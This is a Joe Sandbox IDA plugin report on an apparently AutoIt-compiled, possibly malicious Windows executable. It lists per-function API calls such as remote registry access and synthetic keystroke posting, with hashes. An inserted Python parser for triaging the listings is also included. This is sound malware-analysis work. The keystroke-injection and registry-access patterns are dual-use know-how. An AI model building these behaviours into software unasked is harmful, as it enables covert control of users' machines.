                                                            • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                            • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                            • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                            • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                            • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                            Similarity
                                                            • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 2027346449-0
                                                            • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                            • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                            • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                            • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • GetMenu.USER32 ref: 0047A703
                                                            • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                            • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                            • _wcslen.LIBCMT ref: 0047A79E
                                                            • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                            • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                            • String ID:
                                                            • API String ID: 3257027151-0
                                                            • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                            • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                            • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                            • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                            APIs
                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                            Similarity
                                                            • API ID: ErrorLastselect
                                                            • String ID:
                                                            • API String ID: 215497628-0
                                                            • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                            • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                            • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                            • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0044443B
                                                            • GetKeyboardState.USER32(?), ref: 00444450
                                                            • SetKeyboardState.USER32(?), ref: 004444A4
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                            • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                            • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                            • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00444633
                                                            • GetKeyboardState.USER32(?), ref: 00444648
                                                            • SetKeyboardState.USER32(?), ref: 0044469C
                                                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                            • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                            • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                            • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
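The function records on this page are emitted by the Joe Sandbox IDA plugin as flat text, which is slow to triage by eye once a report runs to thousands of lines. The following parser turns the "APIs" listings into structured records, keeps the "Part of subcall function" attribution, and decodes the message and virtual-key constants behind the keyboard-state routine above (0x100 is WM_KEYDOWN; 0x10, 0x11, 0x12 and 0x5B are VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN). This is an added example, not code from the report or from Joe Sandbox; it assumes one "APIs" header per record and an "API ID:" bullet under "Similarity", which is the layout visible here, and the sample listing inside it is constructed from a few of this page's lines.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Parser for the per-function "APIs" listings emitted by the Joe Sandbox IDA
# plugin, as shown on this page. Added example; not code from the report or
# from Joe Sandbox. Assumes one "APIs" header per function record and an
# "API ID:" bullet under "Similarity" (the layout seen on this page).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
API_ID_LINE = re.compile(r"^\s*•\s*API ID:\s*(?P<id>.*)$")

WM_KEYDOWN = 0x0100
WM_USER = 0x0400          # messages >= WM_USER are private to the target control
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

# Constructed sample: a handful of lines in the shape of the report's listing.
SAMPLE = """\
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
Memory Dump Source
• Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessagePost$KeyboardState$Parent
APIs
  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
• SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
Similarity
• API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw hex strings, "?" where the plugin could not resolve
    ref: int                   # call-site address
    subcall: Optional[int]     # callee address when reported as "Part of subcall"

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an int, or None if it is '?' or absent."""
        if i < len(self.args) and self.args[i] != "?":
            return int(self.args[i], 16)
        return None


@dataclass
class FunctionRecord:
    api_id: str = ""
    calls: List[ApiCall] = field(default_factory=list)

    def direct_apis(self) -> List[str]:
        """APIs called by the function itself (subcall attributions excluded)."""
        return sorted({c.api for c in self.calls if c.subcall is None})


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the listing into one FunctionRecord per 'APIs' block."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            current.calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), sub))
            continue
        m = API_ID_LINE.match(line)
        if m:
            current.api_id = m["id"].strip()
    return records


def describe_message(call: ApiCall) -> Optional[str]:
    """Decode Msg/wParam of a Post/SendMessageW call; WM_USER+n is control-specific."""
    msg, wparam = call.arg_int(1), call.arg_int(2)
    if msg is None:
        return None
    if msg == WM_KEYDOWN:
        key = "?" if wparam is None else VK_NAMES.get(wparam, hex(wparam))
        return f"WM_KEYDOWN {key}"
    if msg >= WM_USER:
        return f"WM_USER+{msg - WM_USER:#x}"
    return f"{msg:#06x}"


def synthetic_keystrokes(record: FunctionRecord) -> bool:
    """True if the function saves/restores keyboard state and posts WM_KEYDOWN."""
    apis = set(record.direct_apis())
    posts = [c for c in record.calls if c.api == "PostMessageW" and c.arg_int(1) == WM_KEYDOWN]
    return {"GetKeyboardState", "SetKeyboardState"} <= apis and bool(posts)


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_id, rec.direct_apis(), "keystrokes" if synthetic_keystrokes(rec) else "")
        for c in rec.calls:
            if c.api in ("PostMessageW", "SendMessageW"):
                print(f"  {c.ref:08X} {c.api} -> {describe_message(c)}")
```

Run it over the full report text instead of SAMPLE to get one record per function; records without an "APIs" header (the page has one such entry) are skipped by design.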
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __snwprintf__wcsicoll_wcscpy
                                                            • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                            • API String ID: 1729044348-3025626884
                                                            • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                            • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                            • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                            • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                            APIs
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                            • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                            • String ID:
                                                            • API String ID: 2354583917-0
                                                            • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                            • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                            • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                            • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                            • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                            • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                            • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                            • String ID:
                                                            • API String ID: 896007046-0
                                                            • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                            • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                            • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                            • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                            APIs
                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                            • GetFocus.USER32 ref: 00448ACF
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                            • String ID:
                                                            • API String ID: 3429747543-0
                                                            • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                            • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                            • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                            • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                            APIs
                                                              • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                              • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                              • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                            • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 3300667738-0
                                                            • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                            • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                            • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                            • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                            • __swprintf.LIBCMT ref: 0045D4E9
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu$\VH
                                                            • API String ID: 3164766367-2432546070
                                                            • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                            • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                            • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                            • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 3850602802-3636473452
                                                            • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                            • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                            • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                            • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                            • String ID:
                                                            • API String ID: 3985565216-0
                                                            • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                            • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                            • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                            • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                            APIs
                                                            • _malloc.LIBCMT ref: 0041F707
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • _free.LIBCMT ref: 0041F71A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free_malloc
                                                            • String ID: [B
                                                            • API String ID: 1020059152-632041663
